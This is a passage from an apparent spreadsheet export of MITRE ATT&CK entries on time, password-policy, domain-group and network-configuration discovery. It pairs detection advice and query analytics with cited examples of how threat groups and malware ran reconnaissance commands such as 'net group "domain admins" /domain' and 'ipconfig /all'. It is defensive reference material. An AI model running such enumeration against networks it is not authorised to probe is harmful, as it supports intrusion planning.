[DarkWatchman](https://attack.mitre.org/software/S0673) can collect the time zone information from the system.(Citation: Prevailion DarkWatchman 2021)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) contains functionality to query the local/system time.(Citation: JoeSecurity Egregor 2020)
Epic
[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net time&lt;/code&gt; command  to get the system time from the machine and collect the current date and time zone information.(Citation: Kaspersky Turla)
EvilBunny
[EvilBunny](https://attack.mitre.org/software/S0396) has used the API calls NtQuerySystemTime, GetSystemTimeAsFileTime, and GetTickCount to gather time metrics as part of its checks to see if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) gathers the time zone information from the victim’s machine.(Citation: ESET GreyEnergy Oct 2018)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can check system time to help determine when changes were made to specified files.(Citation: Bitdefender FunnyDream Campaign November 2020)
GRIFFON
[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve the date and time of the system.(Citation: SecureList Griffon May 2019)	
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) can check the current date-time value of the compromised system, comparing it to the hardcoded execution trigger and can send the current timestamp to the C2 server.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021) 
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can determine the time on the victim machine via IPinfo.(Citation: ESET Grandoreiro April 2020)
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) can obtain the date and time of a system.(Citation: Talos GravityRAT)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can collect the date and time from a compromised host.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed collecting system time from victim machines.(Citation: US-CERT HOPLIGHT Apr 2019)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) gathers the local system time from the victim’s machine.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
KEYPLUG
[KEYPLUG](https://attack.mitre.org/software/S1051) can obtain the current tick count of an infected computer.(Citation: Mandiant APT41)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) uses JavaScript to get the system time.(Citation: Medium Metamorfo Apr 2020) 
MoonWind
[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim's current time.(Citation: Palo Alto MoonWind March 2017)
NOKKI
[NOKKI](https://attack.mitre.org/software/S0353) can collect the current timestamp of the victim's machine.(Citation: Unit 42 NOKKI Sept 2018)
Net
The &lt;code&gt;net time&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to determine the local or remote system time.(Citation: TechNet Net Time)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) can obtain the date and time of the compromised system.(Citation: ESET Okrum July 2019)
OopsIE
[OopsIE](https://attack.mitre.org/software/S0264) checks to see if the system is configured with "Daylight" time and checks for a specific region to be set for the timezone.(Citation: Unit 42 OilRig Sept 2018)
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501) can send time zone information from a compromised host to C2.(Citation: ESET PipeMon May 2020)
PowerDuke
[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the time the machine was built, the time, and the time zone.(Citation: Volexity PowerDuke November 2016)
Proxysvc
As part of the data reconnaissance phase, [Proxysvc](https://attack.mitre.org/software/S0238) grabs the system time to send back to the control server.(Citation: McAfee GhostSecret)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can identify the system time on a targeted host.(Citation: Kaspersky QakBot September 2021)
RTM
[RTM](https://attack.mitre.org/software/S0148) can obtain the victim time zone.(Citation: ESET RTM Feb 2017)
SHARPSTATS
[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the current date and time on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can collect start time information from a compromised host.(Citation: GitHub SILENTTRINITY Modules July 2019)
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) can collect time zone information.(Citation: HP SVCReady Jun 2022)
ShadowPad
[ShadowPad](https://attack.mitre.org/software/S0596) has collected the current date and time of the victim system.(Citation: Kaspersky ShadowPad Aug 2017)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) obtains the system time and will only activate if it is greater than a preset date.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) can execute &lt;code&gt;getinfo&lt;/code&gt;  to discover the current time on a compromised host.(Citation: BlackBerry CostaRicto November 2020)(Citation: CISA AR21-126A FIVEHANDS May 2021)
StoneDrill
[StoneDrill](https://attack.mitre.org/software/S0380) can obtain the current date and time of the victim machine.(Citation: Kaspersky StoneDrill 2017)	
StrifeWater
[StrifeWater](https://attack.mitre.org/software/S1034) can collect the time zone from the victim's machine.(Citation: Cybereason StrifeWater Feb 2022)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) collects the time and date of a system when it is infected.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
T9000
[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the system time during installation.(Citation: Palo Alto T9000 Feb 2016)
TAINTEDSCRIBE
[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;GetLocalTime&lt;/code&gt; for time discovery.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)
Taidoor
[Taidoor](https://attack.mitre.org/software/S0011) can use &lt;code&gt;GetLocalTime&lt;/code&gt; and &lt;code&gt;GetSystemTime&lt;/code&gt; to collect system time.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to determine local time on a compromised host.(Citation: Kaspersky TajMahal April 2019)
Torisma
[Torisma](https://attack.mitre.org/software/S0678) can collect the current time on a victim machine.(Citation: McAfee Lazarus Nov 2020)
UPPERCUT
[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to obtain the time zone information and current timestamp of the victim’s machine.(Citation: FireEye APT10 Sept 2018)
WindTail
[WindTail](https://attack.mitre.org/software/S0466) has the ability to generate the current date and time.(Citation: objective-see windtail1 dec 2018)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) gathers the current time zone and date information from the system.(Citation: ESET Zebrocy Nov 2018)(Citation: CISA Zebrocy Oct 2020)
Zeus Panda
[Zeus Panda](https://attack.mitre.org/software/S0330) collects the current system time (UTC) and sends it back to the C2 server.(Citation: GDATA Zeus Panda June 2017)
build_downer
[build_downer](https://attack.mitre.org/software/S0471) has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.(Citation: Trend Micro Tick November 2019)
ccf32
[ccf32](https://attack.mitre.org/software/S1043) can determine the local time on targeted machines.(Citation: Bitdefender FunnyDream Campaign November 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.
Process Creation
Monitor for newly executed processes that may attempt to access detailed information about the password policy used within an enterprise network or cloud environment.
User Account Metadata
Monitor for contextual data about an account that may attempt to access detailed information about the password policy used within an enterprise network or cloud environment.
Password Policies
Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (&lt;code&gt;C:\Windows\System32\&lt;/code&gt; by default) of a domain controller and/or local computer with a corresponding entry in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;. (Citation: Microsoft Install Password Filter n.d)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net accounts` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used the NtdsAudit utility to collect information related to accounts and passwords.(Citation: NCC Group Chimera January 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used net.exe in a script with &lt;code&gt;net accounts /domain&lt;/code&gt; to find the password policy of a domain.(Citation: FireEye Targeted Attacks Middle East Banks)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net accounts&lt;/code&gt; and &lt;code&gt;net accounts /domain&lt;/code&gt; to acquire password policy information.(Citation: ESET ComRAT May 2020)
BloodHound
[BloodHound](https://attack.mitre.org/software/S0521) can collect password policy information on the target environment.(Citation: CrowdStrike BloodHound April 2018)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can discover the password policies applied to the target system.(Citation: CME Github September 2018)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) collects password policy information with the command &lt;code&gt;net accounts&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)
Net
The &lt;code&gt;net accounts&lt;/code&gt; and &lt;code&gt;net accounts /domain&lt;/code&gt; commands with [Net](https://attack.mitre.org/software/S0039) can be used to obtain password policy information.(Citation: Savill 1999)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) can use &lt;code&gt;Get-PassPol&lt;/code&gt; to enumerate the domain password policy.(Citation: GitHub PoshC2)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for executed commands and arguments that may attempt to find domain-level groups and permission settings.
Group Enumeration
Monitor for logging that may suggest a list of available groups and/or their associated settings has been extracted, ex. Windows EID 4798 and 4799.
OS API Execution
Monitor for API calls associated with finding domain-level groups and permission settings, such as &lt;code&gt;NetGroupEnum&lt;/code&gt;. Other API calls relevant to Domain Group discovery include &lt;code&gt;NetQueryDisplayInformation&lt;/code&gt; and &lt;code&gt;NetGetDisplayInformationIndex&lt;/code&gt;.
Note: Most EDR tools do not support direct monitoring of API calls due to the sheer volume of calls produced by an endpoint but may have alerts or events that are based on abstractions of OS API calls. Dynamic malware analysis tools (i.e., sandboxes) can be used to trace the execution, including OS API calls, for a single PE binary. 
Process Creation
Monitor newly executed processes that may attempt to find domain-level groups and permission settings.
For Linux, auditing frameworks that support alerting on process creation, including the audit daemon (auditd), can be used to alert on invocations of commands such as &lt;code&gt;ldapsearch&lt;/code&gt;.
For MacOS, utilities that work in concert with Apple’s Endpoint Security Framework such as Process Monitor can be used to track usage of commands such as &lt;code&gt;dscacheutil -q group&lt;/code&gt;.
Note: Event IDs are for Sysmon (Event ID 10 - process access) and Windows Security Log (Event ID 4688 - a new process has been created). 
&lt;h4&gt; Analytic 1 - Local Permission Group Discovery - Net &lt;/h4&gt;
&lt;code&gt;processes = filter processes where ((event_id="10" OR event_id="4688") AND
 (exe == "net.exe" OR exe == "net1.exe") AND command_line="*group*/domain*")&lt;/code&gt;
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors use the command `net group "domain admins" /dom` to enumerate domain groups.(Citation: DFIR Conti Bazar Nov 2021)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used [AdFind](https://attack.mitre.org/software/S0552) to enumerate domain groups.(Citation: CrowdStrike StellarParticle January 2022)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used batch scripts to enumerate administrators and users in the domain.(Citation: US-CERT TA18-074A)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used the command `net group "domain admins" /domain` to enumerate domain groups.(Citation: Mandiant FIN7 Apr 2022)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has used specific malware modules to gather domain membership.(Citation: Symantec Inception Framework March 2018)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) performs discovery of permission groups &lt;code&gt;net group /domain&lt;/code&gt;.(Citation: Mandiant Operation Ke3chang November 2014)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has used the AD Explorer tool to enumerate groups on a victim's network.(Citation: MSTIC DEV-0537 Mar 2022)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;net group /domain&lt;/code&gt;, &lt;code&gt;net group “domain admins” /domain&lt;/code&gt;, and &lt;code&gt;net group “Exchange Trusted Subsystem” /domain&lt;/code&gt; to find domain group permission settings.(Citation: Palo Alto OilRig May 2016)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net group "Domain Admins" /domain&lt;/code&gt; to identify domain administrators.(Citation: ESET ComRAT May 2020)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has run `net group` in compromised environments to discover domain groups.(Citation: Secureworks BRONZE SILHOUETTE May 2023)
AdFind
[AdFind](https://attack.mitre.org/software/S0552) can enumerate domain groups.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: Symantec Bumblebee June 2022)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can use `net.exe group "domain admins" /domain` to identify Domain Administrators.(Citation: BitDefender BADHATCH Mar 2021)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can determine if a user on a compromised host has domain admin privileges.(Citation: Microsoft BlackCat Jun 2022)
BloodHound
[BloodHound](https://attack.mitre.org/software/S0521) can collect information about domain groups and members.(Citation: CrowdStrike BloodHound April 2018)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use `net group` for discovery on targeted domains.(Citation: Trend Micro Black Basta October 2022)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can identify targets by querying account groups on a domain contoller.(Citation: Cobalt Strike Manual 4.3 November 2020)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can gather the user accounts within domain groups.(Citation: CME Github September 2018)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) can conduct Active Directory reconnaissance using tools such as Sharphound or [AdFind](https://attack.mitre.org/software/S0552).(Citation: Intrinsec Egregor Nov 2020)
GRIFFON
[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve Windows domain membership information.(Citation: SecureList Griffon May 2019)
Helminth
[Helminth](https://attack.mitre.org/software/S0170) has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands &lt;code&gt;net group Exchange Trusted Subsystem /domain&lt;/code&gt; and &lt;code&gt;net group domain admins /domain&lt;/code&gt;.(Citation: Unit 42 Playbook Dec 2017)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of domain groups with the command &lt;code&gt;net localgroup /domain&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)
Net
Commands such as &lt;code&gt;net group /domain&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate groups.(Citation: Savill 1999)
OSInfo
[OSInfo](https://attack.mitre.org/software/S0165) specifically looks for Domain Admins and power users within the domain.(Citation: Symantec Buckeye) 
POWRUNER
[POWRUNER](https://attack.mitre.org/software/S0184) may collect domain group information by running &lt;code&gt;net group /domain&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)
REvil
[REvil](https://attack.mitre.org/software/S0496) can identify the domain membership of a compromised host.(Citation: Kaspersky Sodin July 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Secureworks REvil September 2019)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use `System.DirectoryServices` namespace to retrieve domain group information.(Citation: GitHub SILENTTRINITY Modules July 2019)
SoreFang
[SoreFang](https://attack.mitre.org/software/S0516) can enumerate domain groups by executing &lt;code&gt;net.exe group /domain&lt;/code&gt;.(Citation: CISA SoreFang July 2016)
WellMess
[WellMess](https://attack.mitre.org/software/S0514) can identify domain group membership for the current user.(Citation: CISA WellMess July 2020)
dsquery
[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on permission groups within a domain.(Citation: TechNet Dsquery)(Citation: Mandiant APT41)
</t>
  </si>
  <si>
    <t>Command Execution
Monitor executed commands and arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.
OS API Execution
Monitor for API calls (such as &lt;code&gt;GetAdaptersInfo()&lt;/code&gt; and &lt;code&gt;GetIpNetTable()&lt;/code&gt;) that may gather details about the network configuration and settings, such as IP and/or MAC addresses.
Process Creation
Monitor for executed processes (such as ipconfig/ifconfig and arp) with arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses.
Note: The Analytic looks for the creation of [ipconfig](https://attack.mitre.org/software/S0100), [route](https://attack.mitre.org/software/S0103), and [nbtstat](https://attack.mitre.org/software/S0102) processes, all of which are system administration utilities that can be used for the purpose of system network configuration discovery. If these tools are commonly used in your environment (e.g., by system administrators) this may lead to false positives and this analytic will therefore require tuning. 
&lt;h4&gt; Analytic 1 - Suspicious Process &lt;/h4&gt;
&lt;code&gt; processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND 
   exe == "C:\Windows\System32\ipconfig.exe" OR 
   exe == "C:\Windows\System32\route.exe" OR 
   exe == "C:\Windows\System32\nbtstat.exe") &lt;/code&gt;
Script Execution
Monitor for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C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.(Citation: DFIR Conti Bazar Nov 2021) 
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `cmd.exe /c ping %userdomain%` for discovery.(Citation: Mandiant APT41)
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors ran `nslookup` and Advanced IP Scanner on the target network.(Citation: Costa AvosLocker May 2022)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to find the public IP address of a compromised system.(Citation: Talos Frankenstein June 2019)
FunnyDream
During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used [ipconfig](https://attack.mitre.org/software/S0100) for discovery on remote systems.(Citation: Bitdefender FunnyDream Campaign November 2020)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used `ipconfig`, `nbtstat`, `tracert`, `route print`, and `cat /etc/hosts` commands.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors discovered the local network configuration with `ipconfig`.(Citation: FoxIT Wocao December 2019)
APT1
[APT1](https://attack.mitre.org/groups/G0006) used the &lt;code&gt;ipconfig /all&lt;/code&gt; command to gather network configuration information.(Citation: Mandiant APT1)
APT19
[APT19](https://attack.mitre.org/groups/G0073) used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim’s machine.(Citation: Unit 42 C0d0so0 Jan 2016)
APT3
A keylogging tool used by [APT3](https://attack.mitre.org/groups/G0022) gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway.(Citation: Symantec Buckeye)(Citation: evolution of pirpi)
APT32
[APT32](https://attack.mitre.org/groups/G0050) used the &lt;code&gt;ipconfig /all&lt;/code&gt; command to gather the IP address from the system.(Citation: Cybereason Cobalt Kitty 2017)
APT41
[APT41](https://attack.mitre.org/groups/G0096) collected MAC addresses from victim machines.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) 
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used [ipconfig](https://attack.mitre.org/software/S0100), [Ping](https://attack.mitre.org/software/S0097), and &lt;code&gt;tracert&lt;/code&gt; to enumerate the IP address and network environment and settings of the local host.(Citation: NCC Group Chimera January 2021)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has collected the IP address and network adapter information from the victim’s machine.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used batch scripts to enumerate network information, including information about trusts, zones, and the domain.(Citation: US-CERT TA18-074A)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) used the command &lt;code&gt;ipconfig&lt;/code&gt; to obtain information about network configurations.(Citation: TrendMicro EarthLusca 2022)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has used `nslookup` and `ipconfig` for network reconnaissance efforts. [FIN13](https://attack.mitre.org/groups/G1016) has also utilized a compromised Symantec Altiris console and LanDesk account to retrieve network information.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used &lt;code&gt;ipconfig /all&lt;/code&gt; to obtain information about the victim network configuration. The group also ran a modified version of [NBTscan](https://attack.mitre.org/software/S0590) to identify available NetBIOS name servers.(Citation: Cybereason Soft Cell June 2019)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has collected IP information via IPInfo.(Citation: Rapid7 HAFNIUM Mar 2021)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used [Ping](https://attack.mitre.org/software/S0097) and `tracert` for network discovery.(Citation: Kaspersky Lyceum October 2021)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) used &lt;code&gt;ipconfig&lt;/code&gt; to gather network configuration information.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has performed local network configuration discovery using &lt;code&gt;ipconfig&lt;/code&gt;.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used `ipconfig/all` to gather network configuration information.(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware gathers the victim's local IP address, MAC address, and external IP address.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)
Moses Staff
[Moses Staff](https://attack.mitre.org/groups/G1009) has collected the domain name of a compromised network.(Citation: Checkpoint MosesStaff Nov 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware to collect the victim’s IP address and domain name.(Citation: Securelist MuddyWater Oct 2018)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used &lt;code&gt;ipconfig&lt;/code&gt; and &lt;code&gt;arp&lt;/code&gt; to determine network configuration information.(Citation: Avira Mustang Panda January 2020)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) uses commands such as &lt;code&gt;netsh interface show&lt;/code&gt; to discover network interface settings.(Citation: Baumgartner Naikon 2015)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;ipconfig /all&lt;/code&gt; on a victim.(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has identified the IP address of a compromised host.(Citation: MalwareBytes SideCopy Dec 2021)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used malware to collect information on network interfaces, including the MAC address.(Citation: ATT Sidewinder January 2021)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers the Address Resolution Protocol (ARP) table from the victim.(Citation: Citizen Lab Stealth Falcon May 2016)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has enumerated the host machine’s IP address.(Citation: Trend Micro TeamTNT)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors use [NBTscan](https://attack.mitre.org/software/S0590) to discover vulnerable systems.(Citation: Dell TG-3390)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used scripts to collect the host's network topology.(Citation: TrendMicro Tropic Trooper May 2020)	
Turla
[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover network configuration details using the &lt;code&gt;arp -a&lt;/code&gt;, &lt;code&gt;nbtstat -n&lt;/code&gt;, &lt;code&gt;net config&lt;/code&gt;, &lt;code&gt;ipconfig /all&lt;/code&gt;, and &lt;code&gt;route&lt;/code&gt; commands, as well as [NBTscan](https://attack.mitre.org/software/S0590).(Citation: Kaspersky Turla)(Citation: Symantec Waterbug Jun 2019)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also retrieved registered RPC interface information from process memory.(Citation: ESET Turla PowerShell May 2019)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has executed multiple commands to enumerate network topology and settings including  `ipconfig`, `netsh interface firewall show all`, and `netsh interface portproxy show all`.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used [ipconfig](https://attack.mitre.org/software/S0100) to identify the network configuration of a victim machine. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also used the PowerShell cmdlet `Get-ADComputer` to collect IP address data from Active Directory.(Citation: Sophos New Ryuk Attack October 2020)(Citation: Mandiant FIN12 Oct 2021)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to enumerate proxy settings in the target environment.(Citation: Zscaler APT31 Covid-19 October 2020)
admin@338
[admin@338](https://attack.mitre.org/groups/G0018) actors used the following command after exploiting a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to acquire information about local networks: &lt;code&gt;ipconfig /all &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used several tools to scan for open NetBIOS nameservers and enumerate NetBIOS sessions.(Citation: PWC Cloud Hopper Technical Annex April 2017)
Action RAT
[Action RAT](https://attack.mitre.org/software/S1028) has the ability to collect the MAC address of an infected host.(Citation: MalwareBytes SideCopy Dec 2021)
AdFind
[AdFind](https://attack.mitre.org/software/S0552) can extract subnet information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the IP address of the victim machine and spawn instances of netsh.exe to enumerate wireless settings.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: SentinelLabs Agent Tesla Aug 2020) 
Agent.btz
[Agent.btz](https://attack.mitre.org/software/S0092) collects the network adapter’s IP and MAC address as well as IP addresses of the network adapter’s default gateway, primary/secondary WINS, DHCP, and DNS servers, and saves them into a log file.(Citation: ThreatExpert Agent.btz)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) can identify the IP address of a victim machine.(Citation: BlackBerry Amadey 2020)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) can determine the public IP and location of a compromised host.(Citation: Medium Anchor DNS July 2020)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can identify the IP of a targeted system.(Citation: Malwarebytes Kimsuky June 2021)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the location, public IP address, and domain name on a compromised host.(Citation: CheckPoint Naikon May 2020)
Arp
[Arp](https://attack.mitre.org/software/S0099) can be used to display ARP configuration information on the host.(Citation: TechNet Arp)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) collects the external IP address from the system. (Citation: Cofense Astaroth Sept 2018)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) can collect the external IP address of the victim.(Citation: Awake Security Avaddon)
Avenger
[Avenger](https://attack.mitre.org/software/S0473) can identify the domain of the compromised host.(Citation: Trend Micro Tick November 2019)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can collect host IP information from the victim’s machine.(Citation: Unit42 Azorult Nov 2018)
BADCALL
[BADCALL](https://attack.mitre.org/software/S0245) collects the network adapter information.(Citation: US-CERT BADCALL)
BADFLICK
[BADFLICK](https://attack.mitre.org/software/S0642) has captured victim IP address details.(Citation: Accenture MUDCARP March 2019)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has collected the victim machine's local IP address information and MAC address.(Citation: US-CERT BLINDINGCAN Aug 2020)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect IP information from the victim’s machine.(Citation: Volexity InkySquid BLUELIGHT August 2021)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;ipconfig /all&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)	
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about the Internet adapter configuration.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has a command to get the public IP address from a system.(Citation: CheckPoint Bandook Nov 2020) 
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can collect the IP address and NetBIOS name of an infected machine.(Citation: Cybereason Bazar July 2020)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) can execute &lt;code&gt;ipconfig&lt;/code&gt; on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) 
BlackEnergy
